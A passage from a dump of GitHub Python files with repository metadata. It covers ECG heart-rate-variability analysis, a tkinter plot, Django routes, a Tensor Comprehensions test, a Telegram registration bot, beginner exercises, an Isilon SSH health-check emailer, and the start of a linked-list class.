signal.welch(60000/HR,fs =fs, nperseg = int(25*fs))\n dx = np.diff(frx)[0]\n \n def nearest(array, value):\n return np.argmin(np.abs(array - value))\n ULF,VLF,LF,HF,LFHF = np.nan,np.nan,np.nan,np.nan,np.nan\n #ULF and VLF are discarded because we mostly work on short data segments\n # if len(HR)/fs > 334:\n # ULF = integrate.simps(psd[1:nearest(frx, .003)],dx=dx)\n # if len(HR)/fs > 303:\n # VLF = integrate.simps(psd[nearest(frx, .0033):nearest(frx, .04)],dx=dx)\n if len(HR)/fs > 7:\n HF = integrate.simps(psd[nearest(frx, .15):nearest(frx, .4)],dx=dx)\n if len(HR)/fs > 25:\n LF = integrate.simps(psd[nearest(frx, .04):nearest(frx, .15)],dx=dx)\n LFHF = LF/HF\n \n return {'ULF':ULF,'VLF':VLF,'LF':LF,'HF':HF,'LFHF':LFHF}\n\ndef HRV_time_domain(nni):\n \"\"\"Calculate time-domain indices from an RRi series\n Parameters\n ----------\n nni : array_like\n sequence containing the NNi series\n Returns\n -------\n results : dict\n Dictionary containing the following time domain indices:\n - RMSSD: root mean squared of the successive differences\n - SDNN: standard deviation of the RRi series\n - NN50: number RRi successive differences greater than 50ms\n - PNN50: percentage of RRi successive differences greater than 50ms\n - MRI: average value of the RRi series\n \"\"\"\n\n diff_nni = np.diff(nni)\n rmssd = np.sqrt(np.mean(diff_nni ** 2))\n sdnn = np.std(nni, ddof=1) # make it calculates N-1\n nn50 = sum(abs(diff_nni) > .050)\n pnn50 = (nn50 / len(nni) * 100)\n\n\n \n return dict(zip(['rmssd', 'sdnn', 'nn50', 'pnn50'], [rmssd, sdnn, nn50, pnn50]))\n\n\n# def interp_NNi_and_HR(NNi, HR, exclude):\n \n \n \n \n \ndef get_instantaneous_HR(r_peaks, total_signal_length, fs):\n NNi = np.diff(r_peaks)/fs\n delix = np.where(NNi > 1.4)[0]\n NNi=np.delete(NNi,delix)\n r_peaks=np.delete(r_peaks,delix)\n BPM = 60 / NNi\n instantaneous_HR = np.interp(x = range(total_signal_length),xp=r_peaks[:-1], fp=BPM)\n return NNi, instantaneous_HR\n\ndef get_ECG_phases(ECG, r_peaks):\n q_peaks, p_peaks, p_start, p_end = ecg_wave_detector_pq(ECG, r_peaks)\n s_peaks, t_peaks, t_start, t_end = ecg_wave_detector_st(ECG, r_peaks)\n categorical_phases = _masks(ECG, r_peaks, p_start, p_end, t_start, t_end)\n \n analytical_phases = np.nan * np.zeros(len(ECG))\n \n for ix in range(len(r_peaks)-1):\n analytical_phases[r_peaks[ix]:r_peaks[ix+1]] = np.linspace(0,2*np.pi, num = r_peaks[ix+1]-r_peaks[ix]) \n \n \n return categorical_phases, analytical_phases\n\ndef get_signal_and_peaks(ECG, fs, method = 'wavelet'):\n \"\"\" This function orients the signal and defines R peak indices accordingly.\n Parameters\n ----------\n signal : array\n raw_ECG_data.\n standard_orientation : bool_\n True or False.\n raw_p_peaks : array\n Indices of the positive peaks extracted from the raw data.\n raw_n_peaks : array\n Indices of the negative peaks extracted from the raw data.\n \n Returns\n -------\n ECG_data : array\n Standardly oriented ECG data.\n r_peaks : array\n Indices of the R peaks.\n \"\"\"\n bandpass = signal.butter(4,(3, 45),btype = 'pass', fs = fs)\n ECG = signal.filtfilt(*bandpass, ECG)\n # standard_orientation = decide_if_standard_orientation(ECG, fs)\n # if standard_orientation == False:\n # ECG *= -1\n\n \n r_peaks = _positive_peaks(ECG, sampling_rate = fs, method = method)\n \n return ECG, r_peaks\n\n\ndef _positive_peaks(raw_ECG_data, sampling_rate=1000, method = 'wavelet'):\n \"\"\"Process a raw ECG signal and extracts R peaks. \n Parameters\n ----------\n signal : array\n Raw ECG signal.\n sampling_rate : int, float, optional\n Sampling frequency (Hz).\n method: 'wavelet' or 'hamilton'. Hamilton will find R-peaks based on the \n iterative hamilton segmenter method. Wavelet find find r-peaks based\n on convolution of the signal with a qrs-complex-shaped wavelet.\n Returns\n -------\n positive_peaks : array\n Positive-peak location indices. \n \"\"\"\n \n if method == 'hamilton':\n order = int(0.3 * sampling_rate)\n filtered, _, _ = st.filter_signal(\n raw_ECG_data, ftype='FIR', band='bandpass', order=order, frequency=[3, 45], sampling_rate=sampling_rate)\n positive_peaks, = biosppy.signals.ecg.hamilton_segmenter(\n filtered, sampling_rate=1000.0)\n positive_peaks, = biosppy.signals.ecg.correct_rpeaks(\n signal=filtered, rpeaks=positive_peaks, sampling_rate=1000, tol=0.05)\n # plt.plot(raw_ECG_data)\n # plt.plot(positive_peaks, raw_ECG_data[positive_peaks], 'or')\n elif method == 'wavelet':\n wv = pywt.Wavelet('sym4')\n _,qrs,_ = wv.wavefun(level = 5)\n cv = signal.fftconvolve(raw_ECG_data, qrs, mode = 'same')\n positive_peaks = signal.find_peaks(np.abs(cv), distance = int(sampling_rate/2), prominence = 200)[0]\n # plt.figure()\n # plt.plot(cv)\n # plt.plot(raw_ECG_data)\n # plt.plot(positive_peaks, cv[positive_peaks], 'or')\n else:\n raise ValueError('no valid method selected')\n \n return positive_peaks\n\n\n\ndef decide_if_standard_orientation(raw_ECG_data, fs = 1000, debug:bool = False) -> bool:\n \"\"\"Returns a bool, if the signal is in the standard ECG orientation\n Parameters\n ----------\n ECG_data\n Returns\n -------\n bool: \n True for success, False otherwise, Error message if undecidable\n \"\"\"\n data_len = len(raw_ECG_data)\n analysis_length = 2000\n n_bins = int(data_len/analysis_length)\n if n_bins == 0:\n raise IndexError(\"The ECG data is shorter than 2 seconds!\")\n\n orientations = []\n for i in range(0,n_bins):\n raw_p_peaks = _positive_peaks(raw_ECG_data[i*analysis_length:(i+1)*analysis_length])\n raw_n_peaks = _positive_peaks(-raw_ECG_data[i*analysis_length:(i+1)*analysis_length])\n\n for i in range(0, len(raw_n_peaks)-1):\n if debug:\n print(f\"P-peak: {raw_p_peaks[i]}\")\n print(f\"N-peak: {raw_n_peaks[0]}\\n\")\n try:\n samples_between_peaks = raw_n_peaks[i] - raw_p_peaks[i]\n if samples_between_peaks > 200:\n \"\"\"Cut after negative peak\"\"\"\n orientations.append(raw_n_peaks[i] > raw_p_peaks[i+1])\n elif samples_between_peaks < -200:\n \"\"\"Cut after positive peak\"\"\"\n orientations.append(raw_n_peaks[i+1] > raw_p_peaks[i])\n else:\n orientations.append(raw_n_peaks[i] > raw_p_peaks[i])\n except IndexError:\n continue\n if len(orientations) > 5:\n break\n if debug:\n print(f\"Orientations: {orientations}\")\n if len(orientations) > 0:\n return 0.5 < np.mean(orientations)\n else:\n return \"Data was impossible to analyse\"\n\n\n\n\ndef _find_closest_in_list(number, array, direction=\"both\", strictly=False):\n \"\"\"Find the closest number in the array from x.\n Parameters\n ----------\n number : float\n The number.\n array : array\n The array to look into.\n direction : string\n \"both\" for smaller or greater, \"greater\" for only greater numbers and \"smaller\" for the closest smaller.\n strictly : bool\n False for stricly superior or inferior or True for including equal. The default is False.\n Returns\n -------\n closest : int\n The closest number in the array.\n \"\"\"\n if direction == \"both\":\n closest = min(array, key=lambda x: abs(x-number))\n if direction == \"smaller\":\n if strictly is True:\n closest = max(x for x in array if x < number)\n else:\n closest = max(x for x in array if x <= number)\n if direction == \"greater\":\n if strictly is True:\n closest = min(filter(lambda x: x > number, array))\n else:\n closest = min(filter(lambda x: x >= number, array))\n\n return(closest)\n\n\ndef _find_peaks(signal):\n \"\"\"Locate peaks based on the derivative of the graph.\n Parameters\n ----------\n signal : array\n ECG signal.\n Returns\n -------\n peaks : array\n An array containing the peak indices.\n \"\"\"\n derivative = np.gradient(signal, 2)\n peaks = np.where(np.diff(np.sign(derivative)))\n return(peaks)\n\n\ndef ecg_wave_detector_pq(signal, r_peaks):\n \"\"\"Returns the localization of the P and Q waves. \n Note: This function determines the peaks based on RR interval. \n Thus, if the data starts after a R peak (for instance with a T wave), \n the function will not be able to detect the first P wave and Q peak.\n Parameters\n ----------\n signal : array\n ECG signal.\n r_peaks : array\n R peak indication indices.\n Returns\n -------\n q_peaks : array\n R peak indication indices.\n p_peaks : array\n P peak indication indices.\n p_start : array\n P wave onsetindices.\n p_end : array\n P wave end indices.\n \"\"\"\n p_peaks = []\n p_s = 0\n p_e = 0\n sampling_rate = 1000\n order = int(0.3 * sampling_rate)\n for index, rpeak in enumerate(r_peaks[:-1]):\n middle = (r_peaks[index+1] - rpeak) / 2\n quarter = int(middle*1/2)\n tquarter = middle*3/2\n eighth = middle*7/4\n epoch = signal[int(rpeak+tquarter):int(rpeak+eighth)]\n try:\n p_peak = int(rpeak+tquarter) + np.argmax(epoch)\n p_peaks.append(p_peak)\n except ValueError:\n p_peak = int(rpeak+tquarter) + int(eighth/7)\n p_peaks.append(p_peak)\n p_peaks = np.array(p_peaks)\n \n q_peaks = []\n for index, p_peak in enumerate(p_peaks):\n epoch = signal[int(p_peak):int(r_peaks[r_peaks > p_peak][0])]\n try:\n q_peak = p_peak + np.argmin(epoch)\n q_peaks.append(q_peak)\n except ValueError:\n pass\n \n p_start = np.zeros(len(p_peaks))\n p_end = np.zeros(len(p_peaks))\n r_peaks = r_peaks.astype(int)\n\n for i in range(len(p_peaks)):\n third = int((r_peaks[i+1]- r_peaks[i])/3)\n h = np.histogram(signal[r_peaks[i+1] - third:p_peaks[i]], bins=30)\n y = np.argmax(h[0])\n meanizo = h[1][y]\n\n p_e = np.argmin(abs(signal[p_peaks[i]-1: q_peaks[i]] - meanizo))\n \n for k in range(100):\n start_val = abs(signal[p_peaks[i]-k] - meanizo)\n if start_val <= 8:\n p_s = p_peaks[i]-k\n break\n\n p_start[i] = p_s\n p_end[i] = p_peaks[i] + p_e\n p_start = p_start.astype(int)\n p_end = p_end.astype(int)\n return (q_peaks, p_peaks, p_start, p_end)\n\ndef ecg_wave_detector_st(signal, r_peaks):\n \"\"\"Returns the localization of the S and T waves. \n Note: This function determines the peaks based on RR interval. \n Thus, if the data starts after a R peak (for instance with a S peak), \n the function will not be able to detect the first T wave and S peak.\n Parameters\n ----------\n signal : array\n ECG signal.\n r_peaks : array\n R peak indication indices.\n Returns\n -------\n s_peaks : array\n S peak indication indices.\n t_peaks : array\n T peak indication indices.\n t_start : array\n T wave onsetindices.\n t_end : array\n T wave end indices.\n \"\"\"\n s_peaks = []\n t_peaks = []\n t_start = []\n t_end = []\n for index, rpeak in enumerate(r_peaks[:-1]):\n middle = (r_peaks[index+1] - rpeak) / 2\n epoch_after = signal[int(rpeak):int(rpeak+middle)]\n \n s_peak_index = np.argmin(epoch_after)\n s_peak = rpeak + s_peak_index\n t_peak_index = s_peak_index + np.argmax(epoch_after[s_peak_index:])\n t_peak = rpeak + t_peak_index\n t_peaks.append(t_peak)\n s_peaks.append(s_peak)\n try:\n inter_st = epoch_after[s_peak_index:t_peak_index]\n inter_st_derivative = np.gradient(inter_st, 2)\n t_wave_start_index = _find_closest_in_list(\n len(inter_st_derivative)/2, _find_peaks(inter_st_derivative)[0])\n t_wave_start = s_peak + t_wave_start_index\n t_wave_end = np.argmin(epoch_after[t_peak_index:])\n t_wave_end = t_peak + t_wave_end\n \n t_start.append(t_wave_start)\n t_end.append(t_wave_end) \n\n except ValueError:\n t_wave_start = s_peak\n t_wave_end = np.argmin(epoch_after[t_peak_index:])\n t_wave_end = t_peak + t_wave_end\n \n t_start.append(t_wave_start)\n t_end.append(t_wave_end)\n t_start = np.array(t_start)\n t_end = np.array(t_end)\n return (s_peaks, t_peaks, t_start, t_end)\n\ndef _masks(signal,r_peaks, p_start, p_end, t_start, t_end):\n \"\"\"\n This function serves to create a mask to be able to define the intervals of the phases.\n Parameters\n ----------\n signal : array\n ECG data signal.\n r_peaks: array\n R peak indices.\n p_start : array\n P start indication indices.\n p_end : array\n P end indication indices.\n t_start : array\n T start indication indices.\n t_end : array\n T end indication indices.\n Returns\n -------\n phases: array\n An array of 1, 2, 3,4 that where each of the numbers is used as a mask for a specific phase.\n 1- P phase\n 2- QRS phase\n 3- T phase\n 4- TP phase\n \"\"\"\n phases = np.zeros(len(signal))\n nni = np.diff(r_peaks) \n ppi =[]\n tti =[]\n qrsi = []\n tpi = []\n zzi = []\n \n for i in range(len(r_peaks)-1): \n # if nni[i] > 400 and nni[i] < 1400:\n ppl = p_end[i]-p_start[i]\n if ppl < 400 and ppl > 0:\n phases[p_start[i]: p_end[i]] = 1\n ppi.append(ppl)\n ttl = t_end[i]-t_start[i]\n if ttl < 700 and ttl > 0:\n phases[t_start[i]: t_end[i]] = 3\n tti.append(ttl)\n tpl = p_start[i]-t_end[i]\n if tpl < 1400 and tpl >0:\n phases[t_end[i]: p_start[i]] = 4 \n tpi.append(tpl)\n for i in range(len(r_peaks)-2): \n # if nni[i] > 400 and nni[i] < 1400 and nni[i+1] > 400 and nni[i+1] < 1400:\n qrsl = t_start[i+1] - p_end[i]\n if qrsl < 500 and qrsl > 0:\n phases[p_end[i]: t_start[i+1]] = 2\n qrsi.append(qrsl)\n return phases\n\n \n\n\n#%%\nif __name__ == \"__main__\":\n ecg = np.load('/Users/fjola/Desktop/LaRe.npy')\n# import pickle\n# with open('/home/marius/Downloads/exampleECG.p', 'rb') as p:\n# ecg = pickle.load(p)\n #ecg= ECG_data\n a=ecg_analyzer(ecg)\n","repo_name":"fjolah/ECGtoolbox","sub_path":"ECG_toolbox.py","file_name":"ECG_toolbox.py","file_ext":"py","file_size_in_byte":24215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"16772278388","text":"from math import*\r\nfrom tkinter import*\r\n\r\nroot = Tk()\r\nroot.title('Semenchuk Vova')\r\nroot.geometry('600x600')\r\n\r\nlabel=Label(root, text='Граф', font='Arial 14 bold', bg='red')\r\nlabel.pack(fill=X)\r\n\r\ncanvas = Canvas(root, height=360, width = 480, bg='black')\r\ncanvas.pack()\r\n\r\nx0, y0 = 200, 200\r\nx1 =50; x2 = 350; dx=10\r\ncanvas.create_line(0, y0,470, y0, fill = 'yellow', arrow = LAST)\r\ncanvas.create_line(x0, 10,x0, 350, fill = 'yellow', arrow = FIRST)\r\n\r\ncanvas.create_text(209,210, text='10')\r\ncanvas.create_text(300,210, text='100')\r\ncanvas.create_text(x0+5,10, text='y', anchor=W)\r\ncanvas.create_text(400,200, text='x', anchor = NW)\r\ncanvas.create_text(x0+10,100, text='100')\r\n\r\np = 50\r\nwhile p<=350:\r\n canvas.create_line(p, 195,p, 205, fill = 'yellow')\r\n canvas.create_line(195, p, 205, p, fill = 'yellow')\r\n p+=10\r\n\r\npoints=[]\r\nfor x in range(x1+30,x2+dx+30,dx):\r\n y = y0-(x-x0-30)**2/100\r\n z = (x,y)\r\n points.append(z)\r\n\r\nprint(points)\r\nprint(len(points))\r\ncanvas.create_line(points, fill='white', smooth=1, width=2)\r\nbutton = Button(root, text='Close', command = quit)\r\nbutton.pack()\r\nroot.mainloop()\r\n","repo_name":"vovasemenchuk/sv","sub_path":"parabola/par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1066648757","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(\n r'^$',\n views.ChileAtiendeServiceListView.as_view(),\n name='service_list'\n ),\n url(\n r'^search/$',\n views.FileSearchJson.as_view(),\n name='file_list_json'\n ),\n]\n","repo_name":"FashtimeDotCom/gobcl-plataforma","sub_path":"services/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31839240006","text":"import tensor_comprehensions as tc\n\nimport torch\nimport torch.cuda\nimport unittest\n\n\nclass TestCosineSimilarity(unittest.TestCase):\n\n # NOTE: TC can't do allocations itself, so everything has to be declared\n # as input or output. Hence, we return the temporary outputs as well\n def test_cosine_similarity(self):\n LANG = \"\"\"\n def cosine_similarity(float(M, N) I1, float(M, N) I2) -> (O, sumI1, sumI2) {{\n sumI1(m) +=! I1(m, n) * I1(m, n)\n sumI2(m) +=! I2(m, n) * I2(m, n)\n O(m) +=! (I1(m, n) * I2(m, n)) / fmax(rsqrt(sumI1(m)) * sqrt(sumI2(m)), {eps})\n }}\n \"\"\"\n cosine_similarity = tc.define(LANG, name=\"cosine_similarity\", constants={\"eps\": 1e-5})\n inp1, inp2 = torch.randn(100, 128).cuda(), torch.randn(100, 128).cuda()\n out = cosine_similarity(inp1, inp2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"prigoyal/TensorComprehensions","sub_path":"test_python/layers/test_cosine_similarity.py","file_name":"test_cosine_similarity.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"14967291149","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton\n\nfrom On_OFF_sensor_bot.data_.config import admins_id\nfrom On_OFF_sensor_bot.filters import IsPrivate\nfrom On_OFF_sensor_bot.keyboards.default import kb_menu\nfrom On_OFF_sensor_bot.loader import dp\nfrom On_OFF_sensor_bot.states import Accept\nfrom On_OFF_sensor_bot.states.registration import Registration\nfrom On_OFF_sensor_bot.utils.dp_api import register_commands, dp_gino\n\n\n@dp.message_handler(text='Отменить регистрацию', state=[Registration.name, Registration.phone, Registration.age])\nasync def quit(message: types.Message, state: FSMContext):\n await state.finish()\n await message.answer('Регистрация отменена', reply_markup=kb_menu)\n\n\n@dp.message_handler(IsPrivate(), Command('register'))\nasync def bot_register(message: types.Message):\n name = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text=f'{message.from_user.full_name}')\n ],\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n await message.answer(f'Привет\\n'\n f'для регистрации введи свое имя:', reply_markup=name\n )\n await Registration.name.set()\n\n\n@dp.message_handler(IsPrivate(), state=Registration.name)\nasync def get_name(message: types.Message, state=FSMContext):\n answer = message.text\n await state.update_data(name=answer)\n phone = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n await message.answer(f'{answer}, пришли номер телефона', reply_markup=phone)\n await Registration.phone.set()\n\n\n@dp.message_handler(IsPrivate(), state=Registration.phone)\nasync def get_phone(message: types.Message, state=FSMContext):\n answer = message.text\n markup = ReplyKeyboardMarkup(\n keyboard=[\n [\n KeyboardButton(text='отменить регистрацию')\n ],\n ],\n resize_keyboard=True,\n )\n try:\n if answer.replace('+', '').isnumeric():\n await state.update_data(phone=answer)\n await message.answer('теперь введи возраст, целым числом', reply_markup=markup)\n await Registration.age.set()\n else:\n await message.answer('введи корректный номер телефона', reply_markup=markup)\n except Exception:\n await message.answer('введи корректный номер телефона', reply_markup=markup)\n\n\n@dp.message_handler(IsPrivate(), state=Registration.age)\nasync def get_age(message: types.Message, state=FSMContext):\n answer = message.text\n if answer.isnumeric():\n if int(answer) < 150:\n await state.update_data(age=answer)\n data = await state.get_data()\n name = data.get('name')\n phone = data.get('phone')\n age = data.get('age')\n await register_commands.new_registration(user_id=message.from_user.id,\n tg_first_name=message.from_user.first_name,\n tg_last_name=message.from_user.last_name,\n name=name,\n phone=phone,\n age=age,\n status='created')\n await message.answer(f'Регистрация ОК\\n'\n f'name: {name}\\n'\n f'Age: {age}\\n'\n f'Phone: {phone}\\n'\n f'позвоним тебе по номеру {phone}')\n await state.finish()\n else:\n await message.answer('введите правльно возраст')\n else:\n await message.answer('введите правльно возраст целым числом')\n\n\n@dp.message_handler(IsPrivate(), text='/registrations', user_id=admins_id)\nasync def get_reg(message: types.Message):\n reg = await register_commands.select_registration()\n ikb = InlineKeyboardMarkup(row_width=1,\n inline_keyboard=[\n [\n InlineKeyboardButton(text='Accept', callback_data='Accept')\n ]\n ])\n await message.answer(f'Дата создания: {reg.created_at}\\n'\n f'id:{reg.user_id}\\n'\n f'Дата создания: {reg.tg_first_name}\\n'\n f'Дата создания: {reg.tg_last_name}\\n'\n f'Дата создания: {reg.name}\\n'\n f'Дата создания: {reg.phone}\\n'\n f'Дата создания: {reg.age}\\n',\n reply_markup=ikb)\n\n\n@dp.callback_query_handler(text='Accept')\nasync def accept(call: types.CallbackQuery):\n await call.message.answer(f'Insert id')\n await Accept.user_id.set()\n\n\n@dp.message_handler(state=Accept.user_id)\nasync def accept(message: types.Message, state: FSMContext):\n await register_commands.accept_registration(int(message.text))\n await message.answer(f\"It's ok: {message.text}\")\n await state.finish()\n\n\n","repo_name":"vadim-romanyuk/On_OFF_sensor","sub_path":"On_OFF_sensor_bot/handlers/users/bot_registration.py","file_name":"bot_registration.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71234871286","text":"\ndef gas_stations(distance, tank_size, stations):\n visited_stations = []\n distance_travelled = 0\n while True:\n if distance_travelled + tank_size >= distance:\n break\n gas_station = max([station for station in stations if station <= distance_travelled + tank_size])\n visited_stations.append(gas_station)\n distance_travelled = gas_station\n\n return visited_stations\n\n#print(gas_stations(320, 90, [50, 80, 140, 180, 220, 290]))\n\ndef is_increasing(seq):\n\tfor i in range(len(seq) - 1):\n\t\tif seq[i + 1] <= seq[i]:\n\t\t\treturn False\n\treturn True\n\ndef is_decreasing(seq):\n\tfor i in range(len(seq) - 1):\n\t\tif seq[i + 1] >= seq[i]:\n\t\t\treturn False\n\treturn True\n\ndef increasing_or_decreasing(seq):\n\tif is_increasing(seq):\n\t\treturn \"Up!\"\n\tif is_decreasing(seq):\n\t\treturn \"Down!\"\n\treturn False\n\n#print(increasing_or_decreasing([1,2,5,9]))\n\ndef is_palindrome(num):\n\tstr_num = str(num)\n\tfront_count = 0\n\tback_count = len(str_num) - 1\n\twhile front_count <= back_count:\n\t\tif str_num[front_count] != str_num[back_count]:\n\t\t\treturn False\n\t\tfront_count += 1\n\t\tback_count -= 1\n\treturn True\n\ndef get_largest_palindrome(num):\n\twhile not is_palindrome(num):\n\t\tnum -= 1\n\treturn num\n\n#print(get_largest_palindrome(1002))\n\ndef is_digit(obj):\n digits = \"1234567890\"\n if str(obj) in digits:\n if len(str(obj)) == 1:\n return True\n return False\n\n#print(is_digit(234))\n\ndef sum_of_digits(num):\n return sum([int(digit) for digit in num])\n\ndef is_number_balanced(num):\n str_num = str(num)\n len_of_num = len(str_num)\n if len(str(num)) == 1:\n return True\n skip_middle_index = 1 if len_of_num % 2 != 0 else 0\n left_part = str_num[:len_of_num//2]\n right_part = str_num[len_of_num//2 + skip_middle_index:]\n\n return sum_of_digits(left_part) == sum_of_digits(right_part)\n\n#print(is_number_balanced(1230))","repo_name":"ilina322/python-101","sub_path":"week_02/week02_problems.py","file_name":"week02_problems.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22930021954","text":"import Graph as nets\nimport time\n\n\n#Menu Options.\noptions=[\n '1.Add new Node',\n '2.Add edge',\n '3.Print Network and exit',\n '4.Load Network',\n '5.Exit'\n]\n\n\n#Menu Handler\ndef printMenu():\n for option in options:\n print(option)\n return int(input())\n\n#Adds a new node by it's name and it's population\ndef addNewNode(Network):\n\n #add the node\n name = input(\"Enter node name: \")\n pop = input((\"Enter node population: \"))\n Network.addNode(pop, name)\n\n\ndef addNewEdge(Network):\n\n #Print available nodes\n if(Network.number_of_nodes()<2):\n print(\"Not enough nodes available\")\n return\n selection=-1\n i=0\n Node1=[]\n Node2=[]\n nodelist = Network.getNodes()\n while(selection<0 or selection>len(nodelist)):\n for node in nodelist:\n print(str(i+1)+\". \"+node.getName())\n i=i+1\n selection=int(input(\"Select node 1 : \"))\n if not (selection<0 or selection>len(nodelist)):\n Node1=nodelist[selection-1]\n else:\n print(\"Wrong option, chose again.\")\n nodelist.remove(Node1)\n\n selection = -1\n while (selection < 0 or selection > len(nodelist)):\n for node in nodelist:\n print(str(i + 1) + \". \" + node.getName())\n i = i + 1\n selection1 = int(input(\"Select node 1 : \"))\n if not (selection1 < 0 or selection1 > len(nodelist)):\n Node2 = nodelist[selection-1]\n else:\n print(\"Wrong option, chose again.\")\n\n #select weight\n #make connection\n\n\n\n#Boot\n\n#Create a new Network.\nnetwork=nets.PopulationNet()\n\n\n#main program.\nwhile (True):\n #Menu and options\n option=printMenu()\n if(option==1):\n addNewNode(network)\n if (option == 2):\n addNewEdge(network)\n if(option==3):\n network.draw()\n if(option==4):\n continue\n if(option==5):\n exit(0)\n\n\n\n\n\"\"\"\ndef addEdge(Network):\n print(\"list of nodes: \" + Network.getNodeNames())\n #Select neighbours to be added.\n selection=None\n while ((selection != \"n\") and (selection != \"N\")):\n print(\"Add neighbouring nodes from (n to skip): \")\n i=0\n nodes=Network.getNodes()\n selections={i in range(1,len(nodes)):nodes}\n print(selections)\n for neighbour in nodes:\n print(str(i)+neighbour.getName())\n i+=1\n selection=input()\n\n\n\n #Add neighbour and it's weight\n if((selection != \"n\") and (selection != \"N\") and (selection in nodes)):\n weight=-1\n while(weight<0 or weight>1):\n weight= input(\"Give edge weight: \")\n Network.addEdge(Node,selection,weight)\n\"\"\"","repo_name":"mchatzinikolaou/Epidemiologic_Model_Network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11146000821","text":"import paramiko,os,re,HTML,smtplib,time,base64\ndef get():\n cd=os.getcwd()\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n s=open(\"Isilon_Cred.txt\",\"r\")\n table_content=[]\n for i in s.readlines():\n rows=[]\n i=i.strip().split(\",\")\n rows.append(\"{}\".format(i[0]))\n u=base64.b64decode(i[2])\n p=base64.b64decode(i[3])\n try:\n ssh.connect(i[1], username=u, password=p)\n stdin, stdout, stderr = ssh.exec_command(\"isi status\") \n opt=''.join(stdout.readlines())\n with open(\"tmp.txt\",\"w\") as f: \n f.write(opt)\n with open(\"tmp.txt\",\"r\") as f:\n isilon_issue=[]\n for line in f.readlines(): \n line=line.strip()\n line=re.sub(\"[ \\t\\n]+\",\" \",line)\n if re.search(\"Cluster Health:\",line):\n if \"OK\" not in line:\n rows.append(line)\n else:\n rows.append(\"OK\")\n except Exception as err:\n rows.append(\"

{}

\".format(err))\n table_content.append(rows)\n s.close()\n return table_content\ndef get_html(table_data):\n header=['Cluster Name',\"Health Status\"]\n htmlcode = HTML.table(table_data,header_row=header)\n with open(\"htmlfile.html\",\"w\") as f:\n f.write(htmlcode)\n fhtml=open(\"fhtml.html\",\"w\")\n with open(\"htmlfile.html\",\"r\") as f:\n fhtml.write(open(\"html_body.html\").read())\n for line in f.readlines():\n if \"\",\"\")\n fhtml.write(line)\n elif \"Cluster Health:\" in line:\n line=line.replace(\"\",\"\")\n fhtml.write(line)\n else:\n fhtml.write(line)\n fhtml.write(\"{} \".format(time.ctime()))\n fhtml.close()\n html_table=open(\"fhtml.html\",\"r\").read()\n return html_table\ndef mail(html_table_code):\n from email.mime.multipart import MIMEMultipart\n from email.mime.text import MIMEText\n From = \"fromemail@xyz.com\"\n To = [\"email1@xyz.com\",\"email2@xyz.com\"]\n Cc = [\"email3@xyz.com\",\"email4@xyz.com\"]\n # Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['Subject'] = \"Isilon Health Status Report\"\n msg['From'] = From\n msg['To'] = \",\".join(To)\n msg['Cc'] = \",\".join(Cc)\n # Create the body of the message (a plain-text and an HTML version).\n # Record the MIME types of both parts - text/plain and text/html.\n #part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html_table_code, 'html')\n # Attach parts into message container.\n msg.attach(part2)\n # Send the message via local SMTP server.\n s = smtplib.SMTP(\"smtpserver.xyz.com\",25)\n # sendmail function takes 3 arguments: sender's address, recipient's address\n # and message to send - here it is sent as one string.\n #s.sendmail(From, To + Cc, msg.as_string())\n s.sendmail(From, To + Cc , msg.as_string())\n s.quit()\ndata=get() \nhtml_table_code=get_html(data)\nmail(html_table_code)\n\n","repo_name":"atish9937/Isilon_Health_Check_Script","sub_path":"Isilon_Health_Check.py","file_name":"Isilon_Health_Check.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34760418750","text":"import math\nfrom colorama import Fore, init\ninit()\n\nclass Activity_SLL:\n class Node:\n #Creamojs el método inicializador de la clasr nodo\n def __init__(self,value):\n self.value = value\n self.next = None\n #Creamos el méotod inicializador de la clase Single_Linked_List\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n \n \n def append(self):\n while True:\n try:\n cant_node = int(input(Fore.CYAN+' Cantidad de nodos a que deseas crear: '+Fore.RESET))\n for node_item in range(cant_node):\n value = input(Fore.CYAN+' Ingresa el valor del nodo: '+Fore.RESET)\n new_node = self.Node(value)\n if self.head == None and self.tail == None:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length +=1\n self.show_elements()\n menu_option = int(input(Fore.YELLOW+' Seleccionar una opción del menu\\n'+Fore.RESET+ Fore.RED+' 1. Añadir nodo con raiz cuadrada\\n' ' 2. Eliminar y Añadir al final elevado al cuadrado\\n' ' 3.Invertir la lista\\n Numero ingresado: '+Fore.RESET))\n while True:\n if menu_option !=1 and menu_option!=2 and menu_option !=3:\n menu_option = 